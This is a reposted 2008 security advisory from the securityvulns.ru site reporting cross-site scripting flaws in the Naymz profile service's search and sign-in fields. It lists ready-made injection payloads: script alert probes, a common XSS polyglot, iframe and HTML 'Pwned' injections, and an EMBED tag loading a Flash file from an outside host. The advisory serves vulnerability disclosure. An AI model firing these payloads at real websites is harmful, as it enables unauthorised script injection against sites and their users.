Computer Security

Security Advisory: Naymz multiple XSS
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [Full-disclosure]  ID-Commerce Security Advisory - SLR-2007-001

  [Full-disclosure] Cross site scripting (XSS) in Moodle 1.8.3

  Member Area System (MAS) Remote File Include Vulnerability (view_func.
php)

  ImageAlbum Remote SQL Injection Vulnerabilities

From:morin.josh_(at)_gmail.com <morin.josh_(at)_gmail.com>
Date:12.01.2008
Subject:Naymz multiple XSS

Naymz is a online profile system with positive and accurate information that you want others to find when they search for you online.


Community Search fails to sanitize:

1."><script>alert('xss')</script>
2.';alert(String.fromCharCode(88,83,
83))//\';alert(String.fromCharCode(88,83,
83))//";alert(String.fromCharCode(88,83,
83))//\";alert(String.fromCharCode(88,83,83))//-
-></SCRIPT>">'><SCRIPT>alert(String.
fromCharCode(88,83,83))</SCRIPT>
3."><iframe>
4.<html><font color="Red"><b>Pwned</b></font></html>
5.'';!--"<XSS>=&{()}

Existing User sign-In fails to sanitize:

1.<html><font color="black"><b>Pwned</b></font></html>
2.<EMBED SRC="http://site.com/xss.swf"

Discovered by: Joshua Morin
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
 


Рейтинг@Mail.ru